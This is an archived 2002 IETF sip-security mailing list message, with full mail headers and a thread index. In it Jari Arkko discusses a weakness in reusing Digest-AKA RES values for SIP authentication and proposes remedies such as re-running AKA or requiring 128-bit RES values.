Re: [Sip-security] RE: SIP authentication problem when using RES in Digest-AKA
Jari Arkko <jari.arkko@piuha.net> Mon, 18 March 2002 18:22 UTC
Received: from optimus.ietf.org (ietf.org [132.151.1.19] (may be forged)) by ietf.org (8.9.1a/8.9.1a) with ESMTP id NAA14241 for <sip-security-archive@odin.ietf.org>; Mon, 18 Mar 2002 13:22:45 -0500 (EST)
Received: (from daemon@localhost) by optimus.ietf.org (8.9.1a/8.9.1) id NAA23825 for sip-security-archive@odin.ietf.org; Mon, 18 Mar 2002 13:22:48 -0500 (EST)
Received: from optimus.ietf.org (localhost [127.0.0.1]) by optimus.ietf.org (8.9.1a/8.9.1) with ESMTP id NAA23639; Mon, 18 Mar 2002 13:18:43 -0500 (EST)
Received: from ietf.org (odin [132.151.1.176]) by optimus.ietf.org (8.9.1a/8.9.1) with ESMTP id NAA23608 for <sip-security@optimus.ietf.org>; Mon, 18 Mar 2002 13:18:37 -0500 (EST)
Received: from p2.piuha.net (p2.piuha.net [131.160.192.2]) by ietf.org (8.9.1a/8.9.1a) with ESMTP id NAA14094 for <sip-security@ietf.org>; Mon, 18 Mar 2002 13:18:33 -0500 (EST)
Received: from piuha.net (p4.piuha.net [131.160.192.4]) by p2.piuha.net (Postfix) with ESMTP id EA92E6A905; Mon, 18 Mar 2002 20:17:34 +0200 (EET)
Message-ID: <3C960ACB.9040907@piuha.net>
Date: Mon, 18 Mar 2002 17:42:03 +0200
From: Jari Arkko <jari.arkko@piuha.net>
Reply-To: jari.arkko@piuha.net
Organization: None
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.5) Gecko/20011014
X-Accept-Language: en-us
MIME-Version: 1.0
To: Greg Rose <ggr@qualcomm.com>
Cc: James Undery <jundery@ubiquity.net>, John W Noerenberg II <jwn2@qualcomm.com>, sip-security@ietf.org, aki.niemi@nokia.com, jari.arkko@ericsson.com, vesa.torvinen@ericsson.fi, Sanjoy Sen <sanjoy@nortelnetworks.com>
Subject: Re: [Sip-security] RE: SIP authentication problem when using RES in Digest-AKA
References: <4.3.1.2.20020318120008.01ac4fb8@127.0.0.1>
Content-Type: text/plain; charset="us-ascii"; format="flowed"
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
Sender: sip-security-admin@ietf.org
Errors-To: sip-security-admin@ietf.org
X-Mailman-Version: 1.0
Precedence: bulk
List-Id: Security Issues for the SIP protocol <sip-security.ietf.org>
X-BeenThere: sip-security@ietf.org
Content-Transfer-Encoding: 7bit
Greg Rose wrote in response to James Undery: >> The RES 'secret' is surely going to be recalculated each time the >> session entropy (i.e. nonce) changes. Thus I'd modify step 4 and add >> pre7 > > This is definitely not in line with the intent of AKA, or the existing > architecture. What I understood James proposing is that *if* AKA is used for the authentication of an INVITE to the home after being used for authenticating a REGISTER, then AKA should be re-run. In the above, do you mean the 3GPP architecture in 'the existing architecture'? From what I understand the 3GPP architecture only intends to authenticate REGISTERs with AKA. Therefore, if draft-niemi allows anything to happen after the first authentication, it is beyond the 3GPP architecture. If plugging a security hole requires that we never allow AKA authentication to be reused and always need a new full AKA run, I would say that's fine. Greg, does preventing reuse of the same RES help to block the security problem? Also, I have proposed simply requiring 128 bit RES values to be used, that solves the problem but is there any reason why we couldn't require it? Then we have another matter of how the INVITEs are authenticated in 3GPP. That is based on the session keys generated as a side effect of AKA. Let's keep the AKA re-run to the home -discussion separate from this. Jari _______________________________________________ Sip-security mailing list Sip-security@ietf.org https://www1.ietf.org/mailman/listinfo/sip-security
- [Sip-security] SIP authentication problem when us… John W Noerenberg II
- [Sip-security] RE: SIP authentication problem whe… Sanjoy Sen
- [Sip-security] [Sipping] RE: SIP authentication p… John W Noerenberg II
- [Sip-security] RE: SIP authentication problem whe… Sanjoy Sen
- [Sip-security] RE: SIP authentication problem whe… Greg Rose
- [Sip-security] RE: SIP authentication problem whe… Greg Rose
- [Sip-security] Re: [Sipping] SIP authentication p… Jari Arkko
- [Sip-security] Re: [Sipping] SIP authentication p… Greg Rose
- [Sip-security] Re: [Sipping] SIP authentication p… Jari Arkko
- [Sip-security] Re: SIP authentication problem whe… Niemi Aki (NET/Espoo)
- [Sip-security] Re: SIP authentication problem whe… Niemi Aki (NET/Espoo)
- [Sip-security] Re: SIP authentication problem whe… Jari Arkko
- [Sip-security] Re: [Sipping] SIP authentication p… Niemi Aki (NET/Espoo)
- [Sip-security] RE: SIP authentication problem whe… James Undery
- [Sip-security] Re: [Sipping] Re: SIP authenticati… Niemi Aki (NET/Espoo)
- [Sip-security] RE: SIP authentication problem whe… Sanjoy Sen
- [Sip-security] RE: SIP authentication problem whe… Greg Rose
- Re: [Sip-security] RE: SIP authentication problem… Jari Arkko
- Re: [Sip-security] RE: SIP authentication problem… Greg Rose
- Re: [Sip-security] RE: SIP authentication problem… Jari Arkko
- Re: [Sip-security] RE: SIP authentication problem… Greg Rose
- Re: [Sip-security] RE: SIP authentication problem… John W Noerenberg II
- Re: [Sip-security] RE: SIP authentication problem… Greg Rose
- Re: [Sip-security] RE: SIP authentication problem… Jari Arkko